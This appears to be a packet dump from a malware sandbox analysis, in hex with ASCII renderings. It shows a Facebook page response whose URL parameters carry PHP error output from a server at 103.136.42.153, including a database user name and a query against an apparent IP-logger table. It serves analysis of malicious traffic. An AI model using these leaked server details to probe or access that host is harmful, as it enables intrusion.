2022-10-07 14:00:15 UTC	1218	IN	Data Raw: 32 35 33 45 3a 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 32 30 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 5c 75 30 30 32 35 32 30 41 63 63 65 73 73 5c 75 30 30 32 35 32 30 64 65 6e 69 65 64 5c 75 30 30 32 35 32 30 66 6f 72 5c 75 30 30 32 35 32 30 75 73 65 72 5c 75 30 30 32 35 32 30 26 23 30 33 39 3b 64 62 6e 65 77 30 31 26 23 30 33 39 3b 5c 75 30 30 34 30 26 23 30 33 39 3b 6c 6f 63 61 6c 68 6f 73 74 26 23 30 33 39 3b 5c 75 30 30 32 35 32 30 28 75 73 69 6e 67 5c 75 30 30 32 35 32 30 70 61 73 73 77 6f 72 64 3a 5c 75 30 30 32 35 32 30 59 45 53 29 5c 75 30 30 32 35 32 30 69 6e 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 5c 2f 77 77 77 5c 2f 77 77 77 72 6f 6f 74 5c 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 5c 2f 73 65 Data Ascii: 253E:\u002520\u002520mysql_pconnect():\u002520Access\u002520denied\u002520for\u002520user\u002520'dbnew01'\u0040'localhost'\u002520(using\u002520password:\u002520YES)\u002520in\u002520\u00253Cb\u00253E\/www\/wwwroot\/103.136.42.153\/se
2022-10-07 14:00:15 UTC	1220	IN	Data Raw: 33 43 5c 2f 66 6f 6e 74 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 5c 2f 73 6d 61 6c 6c 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 5c 2f 66 6f 6e 74 5c 75 30 30 32 35 33 45 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 77 77 77 5f 6c 69 73 74 5f 73 65 6c 65 63 74 6f 72 26 71 75 6f 74 3b 2c 20 36 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 20 74 69 74 6c 65 3d 22 54 75 72 6b 69 73 68 22 3e 54 c3 bc 72 6b c3 a7 65 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 63 Data Ascii: 3C\/font\u00253E\u00250A\u00253C\/small\u00253E\u00250A\u00253Cbr\u00253E\u00250A\u00253Cbr\u00253E\u00250A\u00253C\/b\u00253E\u00250A\u00253C\/font\u00253E", "www_list_selector", 6); return false;" title="Turkish">Trke</a></li><li><a c
2022-10-07 14:00:15 UTC	1221	IN	Data Raw: 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 73 6d 61 6c 6c 25 33 45 25 30 41 25 33 43 66 6f 6e 74 25 32 30 63 6f 6c 6f 72 3d 25 32 32 25 32 33 66 66 30 30 30 30 25 32 32 25 33 45 25 35 42 54 45 50 25 32 30 53 54 4f 50 25 35 44 25 33 43 2f 66 6f 6e 74 25 33 45 25 30 41 25 33 43 2f 73 6d 61 6c 6c 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 2f 62 25 33 45 25 30 41 25 33 43 2f 66 6f 6e 74 25 33 45 22 20 6f 6e 63 6c 69 63 6b 3d 22 72 65 71 75 69 72 65 28 26 71 75 6f 74 3b 49 6e 74 6c 55 74 69 6c 73 26 71 75 6f 74 3b 29 2e 73 65 74 43 6f 6f 6b 69 65 4c 6f 63 61 6c 65 28 26 71 75 6f 74 3b 61 72 5f 41 52 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 65 6e 5f 55 53 26 71 75 6f 74 3b 2c 20 26 71 75 Data Ascii: br%3E%0A%3Cbr%3E%0A%3Csmall%3E%0A%3Cfont%20color=%22%23ff0000%22%3E%5BTEP%20STOP%5D%3C/font%3E%0A%3C/small%3E%0A%3Cbr%3E%0A%3Cbr%3E%0A%3C/b%3E%0A%3C/font%3E" onclick="require("IntlUtils").setCookieLocale("ar_AR", "en_US", &qu
2022-10-07 14:00:15 UTC	1223	IN	Data Raw: 30 74 6f 5c 75 30 30 32 35 32 30 62 65 5c 75 30 30 32 35 32 30 72 65 73 6f 75 72 63 65 2c 5c 75 30 30 32 35 32 30 62 6f 6f 6c 65 61 6e 5c 75 30 30 32 35 32 30 67 69 76 65 6e 5c 75 30 30 32 35 32 30 69 6e 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 5c 2f 77 77 77 5c 2f 77 77 77 72 6f 6f 74 5c 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 5c 2f 73 65 65 6d 6f 72 65 62 74 79 5c 2f 69 6e 63 6c 75 64 65 73 5c 2f 64 61 74 61 62 61 73 65 2e 70 68 70 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 32 30 6f 6e 5c 75 30 30 32 35 32 30 6c 69 6e 65 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 37 33 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c Data Ascii: 0to\u002520be\u002520resource,\u002520boolean\u002520given\u002520in\u002520\u00253Cb\u00253E\/www\/wwwroot\/103.136.42.153\/seemorebty\/includes\/database.php\u00253C\/b\u00253E\u002520on\u002520line\u002520\u00253Cb\u00253E73\u00253C\/b\u00253E\u00250A\
2022-10-07 14:00:15 UTC	1224	IN	Data Raw: 62 61 73 65 2e 70 68 70 25 33 43 2f 62 25 33 45 25 32 30 6f 6e 25 32 30 6c 69 6e 65 25 32 30 25 33 43 62 25 33 45 34 37 25 33 43 2f 62 25 33 45 25 30 41 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 62 25 33 45 57 61 72 6e 69 6e 67 25 33 43 2f 62 25 33 45 3a 25 32 30 25 32 30 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 25 32 30 41 63 63 65 73 73 25 32 30 64 65 6e 69 65 64 25 32 30 66 6f 72 25 32 30 75 73 65 72 25 32 30 26 23 30 33 39 3b 64 62 6e 65 77 30 31 26 23 30 33 39 3b 26 23 30 36 34 3b 26 23 30 33 39 3b 6c 6f 63 61 6c 68 6f 73 74 26 23 30 33 39 3b 25 32 30 28 75 73 69 6e 67 25 32 30 70 61 73 73 77 6f 72 64 3a 25 32 30 59 45 53 29 25 32 30 69 6e 25 32 30 25 33 43 62 25 33 45 2f 77 77 77 2f Data Ascii: base.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_pconnect():%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%20in%20%3Cb%3E/www/
2022-10-07 14:00:15 UTC	1225	IN	Data Raw: 30 30 32 35 32 30 6d 79 73 71 6c 69 5c 75 30 30 32 35 32 30 6f 72 5c 75 30 30 32 35 32 30 50 44 4f 5c 75 30 30 32 35 32 30 69 6e 73 74 65 61 64 5c 75 30 30 32 35 32 30 69 6e 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 5c 2f 77 77 77 5c 2f 77 77 77 72 6f 6f 74 5c 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 5c 2f 73 65 65 6d 6f 72 65 62 74 79 5c 2f 69 6e 63 6c 75 64 65 73 5c 2f 64 61 74 61 62 61 73 65 2e 70 68 70 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 32 30 6f 6e 5c 75 30 30 32 35 32 30 6c 69 6e 65 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 34 37 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c Data Ascii: 002520mysqli\u002520or\u002520PDO\u002520instead\u002520in\u002520\u00253Cb\u00253E\/www\/wwwroot\/103.136.42.153\/seemorebty\/includes\/database.php\u00253C\/b\u00253E\u002520on\u002520line\u002520\u00253Cb\u00253E47\u00253C\/b\u00253E\u00250A\u00253Cbr\
2022-10-07 14:00:15 UTC	1227	IN	Data Raw: 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 73 65 6c 65 63 74 5c 75 30 30 32 35 32 30 69 70 6c 6f 67 67 65 72 5c 75 30 30 32 35 32 30 66 72 6f 6d 5c 75 30 30 32 35 32 30 74 5f 63 68 61 6e 6e 65 6c 73 5c 75 30 30 32 35 32 30 77 68 65 72 65 5c 75 30 30 32 35 32 30 6e 61 6d 65 3d 26 23 30 33 39 3b 33 38 62 32 63 37 61 31 61 66 34 35 34 64 33 38 32 39 32 37 66 38 31 35 34 33 64 38 36 30 35 35 38 38 36 62 63 30 32 38 36 33 34 35 37 26 23 30 33 39 3b 5c 75 30 30 32 35 32 30 6c 69 6d 69 74 5c 75 30 30 32 35 32 30 30 2c 31 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 73 6d 61 6c 6c 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c Data Ascii: 253Cbr\u00253Eselect\u002520iplogger\u002520from\u002520t_channels\u002520where\u002520name='38b2c7a1af454d382927f81543d86055886bc02863457'\u002520limit\u0025200,1\u00253Cbr\u00253E\u00250A\u00253Cbr\u00253E\u00250A\u00253Csmall\u00253E\u00250A\
2022-10-07 14:00:15 UTC	1228	IN	Data Raw: 33 43 2f 62 25 33 45 25 32 30 6f 6e 25 32 30 6c 69 6e 65 25 32 30 25 33 43 62 25 33 45 37 33 25 33 43 2f 62 25 33 45 25 30 41 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 66 6f 6e 74 25 32 30 63 6f 6c 6f 72 3d 25 32 32 25 32 33 30 30 30 30 30 30 25 32 32 25 33 45 25 30 41 25 33 43 62 25 33 45 31 30 34 35 25 32 30 2d 25 32 30 41 63 63 65 73 73 25 32 30 64 65 6e 69 65 64 25 32 30 66 6f 72 25 32 30 75 73 65 72 25 32 30 26 23 30 33 39 3b 64 62 6e 65 77 30 31 26 23 30 33 39 3b 26 23 30 36 34 3b 26 23 30 33 39 3b 6c 6f 63 61 6c 68 6f 73 74 26 23 30 33 39 3b 25 32 30 28 75 73 69 6e 67 25 32 30 70 61 73 73 77 6f 72 64 3a 25 32 30 59 45 53 29 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 73 65 6c 65 63 74 25 32 30 69 70 6c 6f 67 67 65 72 25 32 Data Ascii: 3C/b%3E%20on%20line%20%3Cb%3E73%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cfont%20color=%22%23000000%22%3E%0A%3Cb%3E1045%20-%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%3Cbr%3E%0A%3Cbr%3Eselect%20iplogger%2
2022-10-07 14:00:15 UTC	1229	IN	Data Raw: 30 25 32 32 25 33 45 25 35 42 54 45 50 25 32 30 53 54 4f 50 25 35 44 25 33 43 2f 66 6f 6e 74 25 33 45 25 30 41 25 33 43 2f 73 6d 61 6c 6c 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 2f 62 25 33 45 25 30 41 25 33 43 2f 66 6f 6e 74 25 33 45 22 20 6f 6e 63 6c 69 63 6b 3d 22 72 65 71 75 69 72 65 28 26 71 75 6f 74 3b 49 6e 74 6c 55 74 69 6c 73 26 71 75 6f 74 3b 29 2e 73 65 74 43 6f 6f 6b 69 65 4c 6f 63 61 6c 65 28 26 71 75 6f 74 3b 7a 68 5f 43 4e 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 65 6e 5f 55 53 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 7a 68 2d 63 6e 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 32 30 5c 2f 5c 75 30 30 32 35 33 Data Ascii: 0%22%3E%5BTEP%20STOP%5D%3C/font%3E%0A%3C/small%3E%0A%3Cbr%3E%0A%3Cbr%3E%0A%3C/b%3E%0A%3C/font%3E" onclick="require("IntlUtils").setCookieLocale("zh_CN", "en_US", "https:\/\/zh-cn.facebook.com\/\u00253Cbr\u002520\/\u00253
2022-10-07 14:00:15 UTC	1230	IN	Data Raw: 30 30 32 35 32 30 69 6e 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 5c 2f 77 77 77 5c 2f 77 77 77 72 6f 6f 74 5c 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 5c 2f 73 65 65 6d 6f 72 65 62 74 79 5c 2f 69 6e 63 6c 75 64 65 73 5c 2f 64 61 74 61 62 61 73 65 2e 70 68 70 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 32 30 6f 6e 5c 75 30 30 32 35 32 30 6c 69 6e 65 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 37 33 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 32 30 5c 2f 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 66 6f 6e 74 5c 75 30 30 32 35 32 30 63 6f 6c 6f 72 Data Ascii: 002520in\u002520\u00253Cb\u00253E\/www\/wwwroot\/103.136.42.153\/seemorebty\/includes\/database.php\u00253C\/b\u00253E\u002520on\u002520line\u002520\u00253Cb\u00253E73\u00253C\/b\u00253E\u00250A\u00253Cbr\u002520\/\u00253E\u00250A\u00253Cfont\u002520color
2022-10-07 14:00:15 UTC	1232	IN	Data Raw: 41 25 32 35 32 30 75 73 65 25 32 35 32 30 6d 79 73 71 6c 69 25 32 35 32 30 6f 72 25 32 35 32 30 50 44 4f 25 32 35 32 30 69 6e 73 74 65 61 64 25 32 35 32 30 69 6e 25 32 35 32 30 25 32 35 33 43 62 25 32 35 33 45 25 32 46 77 77 77 25 32 46 77 77 77 72 6f 6f 74 25 32 46 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 25 32 46 73 65 65 6d 6f 72 65 62 74 79 25 32 46 69 6e 63 6c 75 64 65 73 25 32 46 64 61 74 61 62 61 73 65 2e 70 68 70 25 32 35 33 43 25 32 46 62 25 32 35 33 45 25 32 35 32 30 6f 6e 25 32 35 32 30 6c 69 6e 65 25 32 35 32 30 25 32 35 33 43 62 25 32 35 33 45 34 37 25 32 35 33 43 25 32 46 62 25 32 35 33 45 25 32 35 30 41 25 32 35 33 43 62 72 25 32 35 32 30 25 32 46 25 32 35 33 45 25 32 35 30 41 25 32 35 33 43 62 72 25 32 35 32 30 25 32 46 25 32 35 33 45 25 Data Ascii: A%2520use%2520mysqli%2520or%2520PDO%2520instead%2520in%2520%253Cb%253E%2Fwww%2Fwwwroot%2F103.136.42.153%2Fseemorebty%2Fincludes%2Fdatabase.php%253C%2Fb%253E%2520on%2520line%2520%253Cb%253E47%253C%2Fb%253E%250A%253Cbr%2520%2F%253E%250A%253Cbr%2520%2F%253E%
2022-10-07 14:00:15 UTC	1233	IN	Data Raw: 25 32 35 33 45 25 32 35 30 41 25 32 35 33 43 62 72 25 32 35 33 45 25 32 35 30 41 25 32 35 33 43 62 72 25 32 35 33 45 25 32 35 30 41 25 32 35 33 43 25 32 46 62 25 32 35 33 45 25 32 35 30 41 25 32 35 33 43 25 32 46 66 6f 6e 74 25 32 35 33 45 26 61 6d 70 3b 73 6f 75 72 63 65 3d 77 77 77 5f 6c 69 73 74 5f 73 65 6c 65 63 74 6f 72 5f 6d 6f 72 65 22 20 68 72 65 66 3d 22 23 22 20 74 69 74 6c 65 3d 22 53 68 6f 77 20 6d 6f 72 65 20 6c 61 6e 67 75 61 67 65 73 22 3e 3c 69 20 63 6c 61 73 73 3d 22 69 6d 67 20 73 70 5f 6f 74 31 74 35 59 6a 59 4c 33 73 20 73 78 5f 32 63 66 61 37 64 22 3e 3c 2f 69 3e 3c 2f 61 3e 3c 2f 6c 69 3e 3c 2f 75 6c 3e 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 43 75 72 76 65 22 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 69 64 3d 22 70 61 67 65 46 6f Data Ascii: %253E%250A%253Cbr%253E%250A%253Cbr%253E%250A%253C%2Fb%253E%250A%253C%2Ffont%253E&source=www_list_selector_more" href="#" title="Show more languages"><i class="img sp_ot1t5YjYL3s sx_2cfa7d"></i></a></li></ul><div id="contentCurve"></div><div id="pageFo
2022-10-07 14:00:15 UTC	1235	IN	Data Raw: 6b 65 32 73 4d 56 38 4b 45 45 77 4d 64 46 76 43 41 73 5f 76 4d 46 75 34 48 44 62 35 32 6a 66 76 44 6c 54 57 64 31 64 75 65 73 6c 4d 62 61 70 6a 46 43 4f 54 7a 6b 4a 74 68 43 6a 30 4d 66 64 44 49 37 39 62 67 22 20 74 69 74 6c 65 3d 22 43 68 65 63 6b 20 6f 75 74 20 49 6e 73 74 61 67 72 61 6d 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 20 64 61 74 61 2d 6c 79 6e 78 2d 6d 6f 64 65 3d 22 68 6f 76 65 72 22 3e 49 6e 73 74 61 67 72 61 6d 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 75 6c 6c 65 74 69 6e 2e 63 6f 6d 2f 22 20 74 69 74 6c 65 3d 22 43 68 65 63 6b 20 6f 75 74 20 42 75 6c 6c 65 74 69 6e 20 4e 65 77 73 6c 65 74 74 65 72 22 3e 42 75 6c 6c 65 74 Data Ascii: ke2sMV8KEEwMdFvCAs_vMFu4HDb52jfvDlTWd1dueslMbapjFCOTzkJthCj0MfdDI79bg" title="Check out Instagram" target="_blank" rel="nofollow" data-lynx-mode="hover">Instagram</a></li><li><a href="https://www.bulletin.com/" title="Check out Bulletin Newsletter">Bullet
2022-10-07 14:00:15 UTC	1236	IN	Data Raw: 61 6e 64 20 46 61 63 65 62 6f 6f 6b 2e 22 3e 50 72 69 76 61 63 79 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 70 6f 6c 69 63 69 65 73 2f 63 6f 6f 6b 69 65 73 2f 22 20 74 69 74 6c 65 3d 22 4c 65 61 72 6e 20 61 62 6f 75 74 20 63 6f 6f 6b 69 65 73 20 61 6e 64 20 46 61 63 65 62 6f 6f 6b 2e 22 20 64 61 74 61 2d 6e 6f 63 6f 6f 6b 69 65 73 3d 22 31 22 3e 43 6f 6f 6b 69 65 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 5f 34 31 75 67 22 20 64 61 74 61 2d 6e 6f 63 6f 6f 6b 69 65 73 3d 22 31 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 68 65 6c 70 2f 35 36 38 31 33 37 34 39 33 33 30 32 32 31 37 22 20 74 69 74 6c 65 3d 22 4c 65 61 72 6e 20 61 62 6f 75 74 20 41 64 Data Ascii: and Facebook.">Privacy</a></li><li><a href="/policies/cookies/" title="Learn about cookies and Facebook." data-nocookies="1">Cookies</a></li><li><a class="_41ug" data-nocookies="1" href="https://www.facebook.com/help/568137493302217" title="Learn about Ad
2022-10-07 14:00:15 UTC	1238	IN	Data Raw: 3a 22 41 54 37 42 2d 32 4b 65 48 31 67 4f 4f 56 66 4c 4c 48 30 22 7d 2c 22 33 32 31 32 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 37 74 67 64 6f 62 69 45 6f 43 35 71 4f 41 65 7a 4d 22 7d 2c 22 31 39 30 38 31 33 35 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 36 6d 69 47 79 70 4a 6c 33 6d 32 41 71 34 39 4f 63 22 7d 2c 22 35 32 34 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 36 53 4c 4e 52 65 67 31 69 6a 68 33 62 5a 72 4a 73 22 7d 2c 22 32 35 32 36 22 3a 7b 22 72 65 73 75 6c 74 22 3a 74 72 75 65 2c 22 68 61 73 68 22 3a 22 41 54 34 47 4a 37 73 7a 6f 42 42 74 47 44 58 78 70 6f 59 22 7d 2c 22 38 31 39 32 33 36 22 3a 7b 22 72 65 73 75 6c 74 22 Data Ascii: :"AT7B-2KeH1gOOVfLLH0"},"3212":{"result":false,"hash":"AT7tgdobiEoC5qOAezM"},"1908135":{"result":false,"hash":"AT6miGypJl3m2Aq49Oc"},"524":{"result":false,"hash":"AT6SLNReg1ijh3bZrJs"},"2526":{"result":true,"hash":"AT4GJ7szoBBtGDXxpoY"},"819236":{"result"
2022-10-07 14:00:15 UTC	1239	IN	Data Raw: 73 79 67 22 7d 7d 2c 22 71 65 78 44 61 74 61 22 3a 7b 22 36 34 34 22 3a 7b 22 72 22 3a 6e 75 6c 6c 7d 2c 22 36 34 37 22 3a 7b 22 72 22 3a 6e 75 6c 6c 7d 7d 7d 29 7d 29 3b 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 42 6f 6f 74 6c 6f 61 64 65 72 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 6d 29 7b 6d 2e 68 61 6e 64 6c 65 50 61 79 6c 6f 61 64 28 7b 22 63 6f 6e 73 69 73 74 65 6e 63 79 22 3a 7b 22 72 65 76 22 3a 31 30 30 36 33 34 31 35 32 34 7d 2c 22 72 73 72 63 4d 61 70 22 3a 7b 22 6e 36 57 34 78 4d 48 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 37 4d 35 34 5c 2f 79 46 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 42 4c 41 79 Data Ascii: syg"}},"qexData":{"644":{"r":null},"647":{"r":null}}})});requireLazy(["Bootloader"],function(m){m.handlePayload({"consistency":{"rev":1006341524},"rsrcMap":{"n6W4xMH":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3i7M54\/yF\/l\/en_US\/BLAy
2022-10-07 14:00:15 UTC	1241	IN	Data Raw: 70 68 70 5c 2f 76 33 5c 2f 79 55 5c 2f 72 5c 2f 4a 6d 32 6c 32 6a 6c 4c 79 46 36 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 68 4b 59 30 51 4b 54 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 69 5c 2f 72 5c 2f 69 69 44 62 59 4d 43 50 74 42 33 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 68 33 5a 7a 41 6d 47 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 Data Ascii: php\/v3\/yU\/r\/Jm2l2jlLyF6.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"hKY0QKT":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yi\/r\/iiDbYMCPtB3.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"h3ZzAmG":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3
2022-10-07 14:00:15 UTC	1242	IN	Data Raw: 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 78 5c 2f 72 5c 2f 58 44 44 2d 50 31 58 39 38 4b 71 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 52 35 77 31 72 43 4a 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 38 5c 2f 72 5c 2f 53 69 78 4d 30 33 41 58 45 77 38 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 49 61 52 5c 2f 36 75 50 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 Data Ascii: /static.xx.fbcdn.net\/rsrc.php\/v3\/yx\/r\/XDD-P1X98Kq.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"R5w1rCJ":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/y8\/r\/SixM03AXEw8.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"IaR\/6uP":{"type":"js","src":"https:\/\/stati
2022-10-07 14:00:15 UTC	1243	IN	Data Raw: 2c 22 6e 63 22 3a 31 7d 2c 22 68 49 77 41 32 57 36 22 3a 7b 22 74 79 70 65 22 3a 22 63 73 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 79 5c 2f 6c 5c 2f 30 2c 63 72 6f 73 73 5c 2f 51 78 68 59 47 51 37 65 31 4b 30 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 6d 52 70 44 77 6d 64 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 68 5c 2f 72 5c 2f 4d 2d 43 32 73 4c 46 4a 50 30 4d 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 Data Ascii: ,"nc":1},"hIwA2W6":{"type":"css","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yy\/l\/0,cross\/QxhYGQ7e1K0.css?_nc_x=Ij3Wp8lg5Kz","nc":1},"mRpDwmd":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yh\/r\/M-C2sLFJP0M.js?_nc_x=Ij3Wp8lg
